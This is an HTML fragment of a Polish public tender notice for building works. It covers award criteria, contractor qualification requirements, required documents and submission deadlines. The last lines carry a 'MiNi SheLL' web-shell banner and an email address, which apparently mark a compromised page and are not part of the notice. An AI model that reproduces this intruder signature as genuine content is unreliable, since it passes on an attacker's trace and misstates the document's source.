archiwalnym autora projektu.<br/>Charakterystyki wytrzymałościowe i sprężyste przyjęto dla drewna sosnowego litego klasy C 24<br/>o wilgotności 18% . Elementy żelbetowe z betonu C20/25 zbrojone stalą A III. Wartość<br/>jednostkowa oporu granicznego gruntu gf =153 MPa , wartość obliczeniowa obciążenia podłoża<br/>110 MPa. Instalacja centralnego ogrzewania.<br/>Instalacje elektryczne<br/>. Obsługa geodezyjna. Szczegółowy opis zamówienia zawarty jest w dokumentacji projektowej:<br/>- projekt budowlany, opisy techniczne, STWiORB, przedmiar robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga kryterium 60 %;<br/>2) Okres gwarancji (G) – waga kryterium 40 %.<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 60 %<br/>cena najniższa brutto<br/>spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>C = ------------------------------------------------ x 100 pkt x 60 %<br/>cena oferty ocenianej brutto<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez<br/>Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z<br/>realizacją przedmiotu zamówienia.<br/>2) Okres gwarancji (G) – waga 40 %<br/>Zamawiający będzie przyznawał punkty w zakresie kryterium Termin gwarancji. W tym kryterium<br/>Wykonawca może otrzymać max. 40 punktów<br/>Wykonawca może wydłużyć termin odpowiedzialności z tytułu gwarancji. Punktacja będzie<br/>przyznawana w następujący sposób:<br/>a) za udzielony 36 miesięczny okres odpowiedzialności z tytułu gwarancji Wykonawca otrzyma 0<br/>punktów,<br/>b) za udzielony 48 miesięczny okres odpowiedzialności z tytułu gwarancji Wykonawca otrzyma 20<br/>punktów,<br/>c) za udzielony 60 miesięczny (lub więcej) okres odpowiedzialności z tytułu gwarancji Wykonawca<br/>otrzyma 40 punktów.<br/>Zamawiający nie będzie przyznawał punktów częściowych. Oznacza to, że Wykonawca w ramach<br/>kryteriów może otrzymać odpowiednio 0 albo 20 albo 40 punktów. Ilość punktów = %.<br/>Lp= liczba punktów uzyskanych przez ofertę<br/>Lp=C+G<br/>3. Sposób oceny ofert:<br/>1) ocena ofert zostanie przeprowadzona w oparciu o przedstawione powyżej kryteria oceny ofert<br/>będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki, 2) o<br/>wyborze oferty zadecyduje największa liczba uzyskanych punktów (Lp).<br/>4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom uPzp oraz SWZ i zostanie uznana za najkorzystniejszą.<br/>6. Zamawiający poprawi w ofercie:<br/>1) oczywiste omyłki pisarskie,<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek,<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty,<br/>- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>7. W przypadku wystąpienia przesłanek, o których mowa w art. 255 uPzp Zamawiający unieważni<br/>postępowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1 Warunek zostanie spełniony jeśli wykonawca wykaże że<br/>- w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie wykonał zgodnie z zasadami sztuki<br/>budowlanej i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na<br/>przebudowaniu lub wybudowaniu obiektu mieszkalnego, urzędu, szkoły, przedszkola, remizy lub<br/>innego budynku użyteczności publicznej , o wartości nie mniejszej niż 100.000,00 złotych brutto.<br/>- dysponuje lub będzie dysponował osobą posiadającą uprawnienia budowlane do pełnienia<br/>funkcji kierownika robót w specjalności konstrukcyjno-budowlanej bez ograniczeń, określone<br/>przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2021 r. poz. 2351 z<br/>późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na<br/>podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje uzyskane za<br/>granicą, uznane w Polsce na podstawie przepisów o zasadach uznawania kwalifikacji<br/>zawodowych nabytych w państwach członkowskich Unii Europejskiej. – warunek dotyczy<br/>wszystkich części.<br/>Przedmiotowe zamówienie winno zostać ukończone w okresie ostatnich pięciu lat przed<br/>upływem terminu składania ofert.<br/>1.2. Przedłożenia Zamawiającemu, sporządzonego na załączniku do SWZ Nr 7 wykazu osób<br/>skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług kierowanie robotami budowlanymi, wraz z informacjami<br/>na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami.<br/>Zamawiający uzna spełnienie warunku jeżeli z wykazu wynikać będzie posiadanie osób<br/>legitymujących się uprawnieniami do kierowania robotami budowlanymi wydawanymi na<br/>podstawie Rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (tj. Dz. U. 2019 poz. 831) lub odpowiadające im ważne uprawnienia budowlane<br/>wydane na podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnieniabudowlane, które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego<br/>oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo<br/>Budowlane (tj.: Dz.U. 2021 poz. 2351 ) oraz ustawy z dnia 22.12.2015o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2021<br/>poz. 1646), w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Z wykazu musi wynikać dysponowanie:<br/>co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia i posiada<br/>doświadczenie, wykształcenie i kwalifikacje zawodowe, tj. co najmniej jedną osobą, która będzie<br/>uczestniczyć w wykonywaniu zamówienia i posiada doświadczenie, wykształcenie i kwalifikacje<br/>zawodowe, tj. uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w<br/>budownictwie w zakresie kierowania robotami w specjalności konstrukcyjno-budowlanej bez<br/>ograniczeń; ;<br/>(Dokument składany na wezwanie Zamawiającego – do złożenia tego dokumentu zostanie<br/>zobligowany Wykonawca, którego oferta została najwyżej oceniona). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest na podstawie art. 125 ust. 1 uPzp<br/>dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do<br/>SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że<br/>Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę, ofertę<br/>częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; załącznik nr4 do SWZ<br/>2) Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach<br/>zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności dotej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji<br/>i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę,<br/>ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej; załącznik nr4 do SWZ<br/>2) Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji;<br/>3) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty; Załącznik nr 5 do SWZ<br/>4) wykaz osób, które będą uczestniczyły w wykonywaniu zamówienia wraz z określeniem ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do<br/>wykonywania zamówienia -załącznik nr 7 do SWZ;<br/>5. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w pkt. 4 ppkt 2, składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>6. Dokumenty, o którym mowa w pkt 5 powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert.<br/>7. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 5, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 uPzp, zastępuje się je w całości lub<br/>części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem<br/>osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed<br/>organem sądowym, administracyjnym albo organem samorządu zawodowego lub<br/>gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadkuWykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale VIII pkt. 1 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr 6 do<br/>SWZ.<br/>Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie. 3.Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku<br/>do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we<br/>Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ.4.Zmiana umowy wymaga dla swej<br/>ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gminadrawsko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com